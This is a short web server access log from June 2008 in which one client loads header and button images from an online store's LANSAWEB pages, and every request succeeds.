71.121.48.45 - - [30/Jun/2008:02:13:23 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F7D772376B0E600970307O+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
71.121.48.45 - - [30/Jun/2008:02:13:23 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F7D772376B0E600970307O+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
71.121.48.45 - - [30/Jun/2008:02:13:23 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F7D772376B0E600970307O+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
71.121.48.45 - - [30/Jun/2008:02:13:23 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F7D772376B0E600970307O+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
71.121.48.45 - - [30/Jun/2008:02:13:23 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F7D772376B0E600970307O+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
71.121.48.45 - - [30/Jun/2008:02:13:23 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F7D772376B0E600970307O+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
71.121.48.45 - - [30/Jun/2008:02:13:23 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F7D772376B0E600970307O+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
71.121.48.45 - - [30/Jun/2008:02:13:24 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F7D772376B0E600970307O+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
71.121.48.45 - - [30/Jun/2008:02:13:24 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F7D772376B0E600970307O+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
71.121.48.45 - - [30/Jun/2008:02:13:24 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F7D772376B0E600970307O+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
